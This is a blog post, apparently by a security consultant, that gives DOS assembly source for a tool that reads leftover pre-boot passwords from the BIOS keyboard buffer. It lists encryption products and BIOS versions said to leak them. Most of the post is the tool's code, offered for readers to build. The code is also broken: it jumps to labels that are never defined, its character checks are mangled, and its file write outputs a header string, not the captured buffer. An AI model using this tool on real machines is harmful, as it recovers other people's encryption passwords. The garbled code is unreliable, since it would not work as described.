Duplicating Volatility Bioskbd Command Function on Live Windows Systems

I didn’t realize there was much demand for pulling passwords from BIOS keyboard buffers still until I saw that a “bioskbd” command had been added to the new 1.4 version of the Volatility Framework.

Examples of products that leak passwords in this manner:
Microsoft Bitlocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
Secu Star’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)

These passwords can be retrieved from a live system running one of the vulnerable products. Below is assembly language source code for building such a tool. NASM (free) can be used to build your copy of the tool from the source below.

org 100h

section .text

mov ah, 09h
mov dx, welcome
int 0x21 ; display some greeting msg

mov ax,0x40 ; 0x40:0x1e : keyboard buffer address
mov ds,ax

mov si, 0x1e
mov di, buffer
mov cx, 0x10

mov ax, [ds:si]

xor ah,ah

cmp al, 0x20
jae keepcopying
mov ax, 0x20

cmp al, 0x7e
jb keepcopying2
mov ax, 0x20

mov [cs:di], ax
inc di
add si, byte +0x2

loop leakloop ; if CX not 0, then decrement CX and loop back up

push es
pop ds

mov ah, 0x3c ; MS DOS Create file Function
mov dx, fname
xor cx,cx
int 0x21

mov ax, 0x3d01 ; MS DOS Open file Function
int 0x21
mov bx, ax ; AX has the file handle if the open file call worked

mov ah, 0x40
mov cx,0x30
mov dx, Msg
int 0x21 ; Write buffer to file

mov ax,0x4c ; Quit
int 0x21

section .data

welcome db ”,10,13
db ‘Dumping password to file : PASSLEAK.TXT’,10,13
db ‘Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.’,10,13
db ‘This is a circular buffer, so your password might wrap around to the front.’,10,13
db ‘It should have the last 16 printable characters typed at the login screen.’,10,13
db ‘$’,10,13

handle: dw 0
fname db ‘Passleak.txt’,0
Msg: db ‘BIOS keyboard buffer contains: ‘,0
buffer: times 32 db ‘X’


email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement


Leave a Reply